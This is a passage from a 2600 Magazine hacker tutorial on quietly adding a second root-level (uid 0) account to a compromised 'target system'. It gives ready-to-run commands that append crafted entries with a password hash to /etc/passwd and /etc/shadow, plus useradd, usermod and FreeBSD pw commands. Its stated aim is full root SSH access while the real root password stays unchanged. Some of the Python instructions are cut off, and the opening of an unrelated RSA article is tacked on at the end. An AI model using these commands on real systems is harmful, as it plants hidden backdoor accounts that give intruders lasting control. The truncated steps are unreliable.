2600 Magazine_ The Hacker Quarterly - Digital Edition - Summer 2011 - 2600 Magazine [20]
Let's Do It!
The first method to add a user non-interactively is very simple. Add a user to your own system with a password and the group membership you want, then copy and echo the lines for that user from your passwd and shadow file into /etc/passwd and /etc/shadow on the target system. I'll show you how to add a user that shares a group/userid with root in the next section, but a quick note on how: you'll want to add a user to your system with the same privileges/memberships as root.
Example: When I created a user called “test” on my system with a password of "password", this is what that user’s line looked like in my passwd/shadow files:
my /etc/passwd:
test:x:0:0::/home/test:/bin/sh
my /etc/shadow:
test:$6$aae8qp/j$r0c.HGGbDsIRRLc4x2htq588feJ3rsjzFvZOd/nawNkpA.D.kLzzAZA4UhfMc7zU8B13WuFu8oC8eKrXxaYxa/:14929:0:99999:7:::
On the system you have non-interactive access on, simply do this:
echo 'test:x:0:0::/home/test:/bin/sh' >> /etc/passwd
echo'test:$6$aae8qp/j$r0c.HGGbDsIRRLc4x2htq588feJ3rsjzFvZOd/nawNkpA.D.kLzzAZA4UhfMc7zU8B13WuFu8oC8eKrXxaYxa/:14929:0:99999:7:::'>> /etc/shadow
The second method is a bit more involved, but can also be used/modified to script adding/changing users' passwords non-interactively. This method also demonstrates using the python crypt lib and is a good way to learn some *nix administration.
For systems that support the useradd (not adduser) command, do the following:
useradd username -o -u 0 -g 0
The -o switch allows multiple users to have the same uid/guid (0 is root). The user will have no password at the moment. In normal operation you’d simply issue the passwd command, but this will not work with a non-interactive shell. Assuming you have access to a system with python installed (and since the system you’re logging in from is backtrack 4 R1, I know it’s got python!), simply enter python and hit return.
Now you’re at the >>> prompt. Type in import crypt; print and hit enter. Next, type crypt.crypt( The output you’ll receive will be the encrypted password. Copy it down. Now type usermod -p encrypted password username and hit enter. This assigns your new user a password. Now you can ssh in and have full interactive root access to the system, and root’s password is unchanged. For systems that support the pw command (FreeBSD for example), the steps are similar but the commands are a tad different. I fooled around a bit and found a working set of commands. pw useradd -o -u 0 -g 0 -n username The above adds the user with no password. The steps are the same for generating the encrypted password, so use python and crypt from above and copy the output. Then enter echo encrypted_password | pw usermod -n usename -h 0 The above command assigns the password to the user. Now, just as before, you have an account with root privileges, but the system’s root account is unchanged. You may ask yourself, "Why would I choose the second method rather than the first, simple echo method?" In most cases, you'll find the first method will work just fine. But the second method may be helpful if you're experimenting with scripting user add/modify actions or in some strange instance when you don't have the ability to echo commands into the passwd/shadow files. I hope you find this useful. Good luck and happy hacking! * * * Simple RSA Encryption or Human-Calculable Encryption At first glance, learning cryptography can be as tedious and time consuming as many other things in life, just as learning a new language can be difficult in getting familiar with the strange syntax. There are different kinds of cryptographic methods, one of them being the RSA public key cryptosystem.
by b3ard | 1325 words